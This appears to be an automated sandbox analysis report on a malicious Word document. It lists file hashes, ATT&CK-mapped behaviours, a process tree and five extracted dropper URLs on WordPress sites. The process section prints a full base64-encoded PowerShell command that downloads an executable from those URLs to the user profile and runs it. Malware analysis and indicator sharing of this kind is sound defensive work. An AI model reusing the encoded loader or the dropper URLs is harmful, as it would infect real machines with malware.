bc987e7b5bd775460bdfe88b6b9147a2f88664361c4d0a332869ec51b19e2578

General

Target

bc987e7b5bd775460bdfe88b6b9147a2f88664361c4d0a332869ec51b19e2578.doc
Size

164KB
MD5

274708206bf5c9740b99dd9eb0a71f7a
SHA1

6f3933b653c85c6305d1451871950851a3e7a30f
SHA256

bc987e7b5bd775460bdfe88b6b9147a2f88664361c4d0a332869ec51b19e2578
SHA512

27b1e5da776ddfcb4fbbf4d7ec617b366cc3d4e8cd2b8649d69021e9c9ad6d8307ce7e047f39c1b9764cd6c53731f47bc4d7a18cfa555cd77189edaa737e087c

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://www.palmettoslidingdoorrepair.com/wp-admin/user/6C/

exe.dropper

http://iheartflix.com/wp-content/2SP/

exe.dropper

https://www.mqhealthcare.com/wp-content/GwV/

exe.dropper

http://oykadanismanlik.net/wp-admin/HVN/

exe.dropper

http://qc-isf.com/zaxyzgc/fLXk/

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3536	3512	powershell.exe	65

Blacklisted process makes network request 5 IoCs

flow	pid	Process
20	3536	powershell.exe
22	3536	powershell.exe
25	3536	powershell.exe
32	3536	powershell.exe
34	3536	powershell.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
936	WINWORD.EXE
936	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
3536	powershell.exe
3536	powershell.exe
3536	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3536	powershell.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
936	WINWORD.EXE
936	WINWORD.EXE
936	WINWORD.EXE
936	WINWORD.EXE
936	WINWORD.EXE
936	WINWORD.EXE
936	WINWORD.EXE

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\bc987e7b5bd775460bdfe88b6b9147a2f88664361c4d0a332869ec51b19e2578.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:936

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -e JABkAEEAUQBRAHcAYwA9ACgAJwB3AEEAVQAnACsAJwAxAEEAQQAnACkAOwAkAEgANABVAEEAWgBBAD0ALgAoACcAbgBlAHcALQBvAGIAJwArACcAagBlACcAKwAnAGMAdAAnACkAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABYADQAQQBHAEcAQwBvAD0AKAAnAGgAJwArACcAdAB0AHAAOgAnACsAJwAvACcAKwAnAC8AdwB3ACcAKwAnAHcALgBwAGEAJwArACcAbABtACcAKwAnAGUAdAAnACsAJwB0AG8AcwBsAGkAJwArACcAZABpAG4AJwArACcAZwAnACsAJwBkACcAKwAnAG8AbwByACcAKwAnAHIAZQBwAGEAaQAnACsAJwByACcAKwAnAC4AYwBvAG0AJwArACcALwB3AHAALQBhAGQAJwArACcAbQBpAG4ALwAnACsAJwB1AHMAZQByAC8AJwArACcANgBDAC8AQABoAHQAJwArACcAdABwADoAJwArACcALwAvACcAKwAnAGkAaABlAGEAcgB0ACcAKwAnAGYAJwArACcAbAAnACsAJwBpAHgALgBjAG8AbQAvAHcAJwArACcAcAAnACsAJwAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAJwArACcAZQBuAHQALwAyAFMAJwArACcAUAAvACcAKwAnAEAAJwArACcAaAB0AHQAcABzADoALwAvAHcAdwB3ACcAKwAnAC4AbQBxAGgAZQBhAGwAdAAnACsAJwBoACcAKwAnAGMAYQByAGUALgBjACcAKwAnAG8AbQAvAHcAJwArACcAcAAnACsAJwAtAGMAbwBuAHQAZQAnACsAJwBuACcAKwAnAHQALwBHACcAKwAnAHcAJwArACcAVgAnACsAJwAvAEAAJwArACcAaAAnACsAJwB0AHQAcAAnACsAJwA6AC8ALwAnACsAJwBvACcAKwAnAHkAawAnACsAJwBhAGQAJwArACcAYQBuAGkAcwBtAGEAbgBsACcAKwAnAGkAJwArACcAawAuAG4AZQAnACsAJwB0AC8AdwBwAC0AYQBkAG0AaQBuAC8ASAAnACsAJwBWAE4ALwAnACsAJwBAAGgAdAB0ACcAKwAnAHAAOgAvAC8AcQBjACcAKwAnAC0AaQAnACsAJwBzAGYALgBjAG8AbQAvAHoAYQB4ACcAKwAnAHkAegBnACcAKwAnAGMALwBmACcAKwAnAEwAWABrAC8AJwApAC4AKAAnAFMAJwArACcAcABsAGkAdAAnACkALgBJAG4AdgBvAGsAZQAoACcAQAAnACkAOwAkAGEAQgBBAHcAUQB4AD0AKAAnAEcAdwAnACsAJwBCAEcARAB3ACcAKQA7ACQAbABBAEEAUQBBAGMAQQBVACAAPQAgACgAJwAzACcAKwAnADYANwAnACkAOwAkAHQAQQBYAFUAQQBRAEEAPQAoACcAQQBCACcAKwAnAEQAQQBYAFEAQQBBACcAKQA7ACQAWQBYAEMAQQBBAEEAbwBDAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABsAEEAQQBRAEEAYwBBAFUAKwAoACcALgAnACsAJwBlAHgAZQAnACkAOwBmAG8AcgBlAGEAYwBoACgAJAByAFUAQQBrAFgAUQAxAEEAIABpAG4AIAAkAFgANABBAEcARwBDAG8AKQB7AHQAcgB5AHsAJABIADQAVQBBAFoAQQAuACgAJwBEAG8AJwArACcAdwBuAGwAbwAnACsAJwBhAGQARgAnACsAJwBpAGwAZQAnACkALgBJAG4AdgBvAGsAZQAoACQAcgBVAEEAawBYAFEAMQBBACwAIAAkAFkAWABDAEEAQQBBAG8AQwApADsAJABqAEEAVQBCAEEARwBBAD0AKAAnAGsAYwBVAEEAJwArACcAWgBBAEIAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQB0AGUAJwArACcAbQAnACkAIAAkAFkAWABDAEEAQQBBAG8AQwApAC4AIgBMAEUAbgBnAGAAVABIACIAIAAtAGcAZQAgADQAMAAwADAAMAApACAAewAuACgAJwBJAG4AdgBvAGsAJwArACcAZQAnACsAJwAtAEkAJwArACcAdABlAG0AJwApACAAJABZAFgAQwBBAEEAQQBvAEMAOwAkAHYARABBAEEAQQBDAGMAPQAoACcAawB4ACcAKwAnAEEANABEAEEAUQAxACcAKQA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAewB9AH0AJABpAEEAQQBaAFoAdwBEAD0AKAAnAFUAQgA0ACcAKwAnADQAQgBCACcAKQA7AA==
1⤵
- Process spawned unexpected child process
- Blacklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3536

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/936-0-0x000001B8D8500000-0x000001B8D8B37000-memory.dmp

Filesize
6.2MB

Download
memory/3536-4-0x00007FFAE34C0000-0x00007FFAE3EAC000-memory.dmp

Filesize
9.9MB

Download
memory/3536-5-0x0000021382B10000-0x0000021382B11000-memory.dmp

Filesize
4KB

Download
memory/3536-6-0x000002139AE40000-0x000002139AE41000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads